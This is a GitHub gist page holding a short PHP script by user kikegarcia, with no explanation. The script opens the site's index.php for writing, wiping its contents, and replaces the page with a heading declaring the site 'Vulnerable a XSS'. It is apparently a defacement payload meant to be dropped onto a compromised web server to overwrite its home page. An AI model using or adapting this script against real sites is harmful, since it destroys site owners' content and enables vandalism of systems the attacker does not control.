Skip to content

Instantly share code, notes, and snippets.

@kikegarcia
Last active October 31, 2018 20:25
Show Gist options
  • Save kikegarcia/05997d4e056af1c17a0c567ff4f0d49a to your computer and use it in GitHub Desktop.
Save kikegarcia/05997d4e056af1c17a0c567ff4f0d49a to your computer and use it in GitHub Desktop.
<?php
$a = fopen("index.php","w");
$b = "<center><h1>Vulnerable a XSS</h1></center>";
fwrite($a,$b);
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment